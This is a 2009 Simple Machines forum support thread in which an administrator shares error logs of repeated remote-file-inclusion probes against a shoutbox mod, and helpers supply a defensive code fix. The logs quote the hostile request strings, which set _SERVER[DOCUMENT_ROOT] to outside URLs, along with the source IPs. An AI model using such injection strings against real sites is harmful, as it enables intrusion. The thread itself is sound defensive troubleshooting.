News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

"urlencode expects parameter 1 to be string, array given" attacked? exploited?

Started by patalete, July 04, 2009, 06:18:06 PM

Previous topic - Next topic

patalete

Since yesterday (friday) I have spotted several "attacks" in error logs of forum.

they are all throwing similar error in log and it looks kinda suspicious to me..

can someone take a look an find an explanation?


SMF 2.0 RC1-1
SimplePortal 2.2.2


*********


Guest     Today at 00:05:25
89.108.84.112      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 23:37:22
82.146.59.116      
    Type of error: General
####/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 23:36:47
89.108.84.112      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 21:17:14
66.232.143.238      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186


*********
they all come from several ips and countries in a relatively short time lapse...
whats this all about?
thanks

Arantor

Well, the core reason is that there are multiple ?'s in the URL when there should only be 1.

Since the fault is coming up in SimplePortal, you may get a more relevant answer in the SimplePortal thread over in Modifications.

patalete

so I link back here or post it again in SP thread  :P ???

Arantor

Post again in the SP thread, referencing this one.


Arantor

We'll leave this one open in case you don't get a reply from the SP thread (though I'm sure you will).

patalete

#6
no reply inn SP thread and today this started again.. I already updated the post in that thread so I keep this updated too just in case...
also modified topic tittle here now that seems blank.gif is not the only source of "errors".

I banned yesterday all ips from I were receiving this queries, but now today...
from a germany IP and a new site in .. Russian?! an with a new filename...


Guest Today at 08:40:11
80.67.26.40     
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt???

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186


I dont think might be something good :/

Arantor

It's an SP issue, first and foremost, since it's handling urlencodes, but the multiple ? in it is confusing matters.

You could try reporting it on http://www.simpleportal.net which might see it get answered quicker.

patalete

ok, new help request have been opened now in SP site.

I leave here the link in case someone is interested to track this issue

http://simpleportal.net/index.php?topic=2759.0


thanks.

[SiNaN]

This isn't related to SimplePortal, as it doesn't use urlencode() function at all. It is the error message that gives you the impression that it is related to SimplePortal, because portal layers are included in all pages. Disable template eval, then check your error logs again and you'll see a more accurate error message. You can get more information on how to disable/enable template eval here:

http://www.simplemachines.org/community/index.php?topic=290186.0

* [SiNaN] wonders if SimplePortal should strip out its name from such inaccurate error messages. ::)
Former SMF Core Developer | My Mods | SimplePortal

patalete

thanks sinan..

will do it and check it later..and  just wait till this happen again..

will be back when something new appear :)

patalete

well.. I though it would never come back even when I raised the bans of known ip's...but here it is...

now the errors shows up and I think its now clearer...it must be with  nneonneo's Shoutbox...

here the new errors with template eval disabled..


Guest Yesterday at 19:57:49
123.143.98.5     
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/index.template.php
Line: 186

Guest Yesterday at 19:57:45
123.143.98.5   
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/index.template.php
Line: 186


here is marked the #186 that belongs to where we ahve the yshout code.
Quote
....
// YSHOUT HERE - <head> code
180   global $boardurl,$shoutFile;
181   $shoutFile='home';
182   $scripturlparsed = parse_url($scripturl);
183   $scriptpath=isset($scripturlparsed['path'])?$scripturlparsed['path']:'/';
184   $args='';
185   foreach($_GET as $key => $value) // passthrough $_GET
186      $args.='&'.urlencode($key).'='.urlencode($value);
187   echo '
....

Our SB is set to registered members only, guest just see a msg about that..

so whats that?

a SB spambot? a security hole? nothing?
>:(

cheers

Kindred

well, there are lots of potential issues with shoutboxes... (security wise)


is http://quangpham.info your site?  and if so, are you running some sort of wordpress mod/bridge?
http://quangpham.info/wp-includes/images/blank.gif seems to be looking for a blank image in a wordpress includes directory....

If that is NOT your site, then yes, it would appear to be a hack attempt, although it is getting trapped before execution.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

patalete

Hi kindred, none of those belong to my site or domain...

all "attacks" come from worldwide ip ranges but all point to same source..in this case those two sites


http://www.peb.com.ua

http://quangpham.info

123.143.98.5

80.67.26.40

82.146.59.116

89.108.84.112

66.232.143.238



I'm receiving like 3-4 weekly "attacks" from listed ips..
the ip's look like static ones coming from rented dedicated servers.
maybe someone can take note of this and add them to a spamlist or blacklist.

I'm aware of the SB risks but I  would like to keep it On, any special advise to avoid this stuff or just  keep it like it is & showing the errors in logs..

thanks

Kindred

well, There is nothing you can do to "avoid" hack ATTEMPTS, just the hack results. :)

So, I'd say just keep an eye on it.   It is probably someone attempting a vulnerability that was previously patched.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

patalete


[SiNaN]

You can prevent the error by:

Code (Find) Select
$args.='&'.urlencode($key).'='.urlencode($value);

Code (Replace) Select
if (!is_array($value) && !is_array($key))
$args.='&'.urlencode($key).'='.urlencode($value);


I doubt he could cause trouble with that, but still you may want to ask the mod author to check it deeply in the support topic of the mod.

And yeah, you can enable the template eval now.
Former SMF Core Developer | My Mods | SimplePortal

patalete

Nice... all done by now.

Will report to nneonneo  but seems that he has been out  for a while now.. "Last Active: June 16"

I think this is solved :P

Advertisement: